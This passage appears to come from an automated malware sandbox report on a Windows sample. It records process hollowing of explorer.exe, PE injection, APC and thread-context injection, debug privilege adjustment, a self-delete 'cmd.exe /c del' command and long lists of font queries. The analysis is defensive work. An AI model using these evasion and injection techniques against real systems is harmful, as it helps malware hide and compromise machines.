          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506A61C mov eax, dword ptr fs:[00000030h]11_2_0506A61C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506A61C mov eax, dword ptr fs:[00000030h]11_2_0506A61C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503E620 mov eax, dword ptr fs:[00000030h]11_2_0503E620
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05074A2C mov eax, dword ptr fs:[00000030h]11_2_05074A2C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05074A2C mov eax, dword ptr fs:[00000030h]11_2_05074A2C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050EFE3F mov eax, dword ptr fs:[00000030h]11_2_050EFE3F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05039240 mov eax, dword ptr fs:[00000030h]11_2_05039240
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05039240 mov eax, dword ptr fs:[00000030h]11_2_05039240
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05039240 mov eax, dword ptr fs:[00000030h]11_2_05039240
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05039240 mov eax, dword ptr fs:[00000030h]11_2_05039240
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05047E41 mov eax, dword ptr fs:[00000030h]11_2_05047E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05047E41 mov eax, dword ptr fs:[00000030h]11_2_05047E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05047E41 mov eax, dword ptr fs:[00000030h]11_2_05047E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05047E41 mov eax, dword ptr fs:[00000030h]11_2_05047E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05047E41 mov eax, dword ptr fs:[00000030h]11_2_05047E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05047E41 mov eax, dword ptr fs:[00000030h]11_2_05047E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050FAE44 mov eax, dword ptr fs:[00000030h]11_2_050FAE44
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050FAE44 mov eax, dword ptr fs:[00000030h]11_2_050FAE44
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050FEA55 mov eax, dword ptr fs:[00000030h]11_2_050FEA55
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050C4257 mov eax, dword ptr fs:[00000030h]11_2_050C4257
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504766D mov eax, dword ptr fs:[00000030h]11_2_0504766D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050EB260 mov eax, dword ptr fs:[00000030h]11_2_050EB260
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050EB260 mov eax, dword ptr fs:[00000030h]11_2_050EB260
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\explorer.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe Memory written: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\explorer.exe Thread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: 13E0000
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe Process created: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe {path}
          Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe'
          Source: explorer.exe, 00000007.00000002.911089779.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000007.00000000.690773067.0000000001080000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.912803078.0000000003750000.00000002.00000001.sdmp Binary or memory string: Program Manager
          Source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.733414389.00000000032E0000.00000040.00000001.sdmp, explorer.exe, 00000007.00000000.690773067.0000000001080000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.912803078.0000000003750000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.690773067.0000000001080000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.912803078.0000000003750000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.733414389.00000000032E0000.00000040.00000001.sdmp Binary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
          Source: explorer.exe, 00000007.00000000.690773067.0000000001080000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.912803078.0000000003750000.00000002.00000001.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000007.00000000.711037304.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe Queries volume information: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
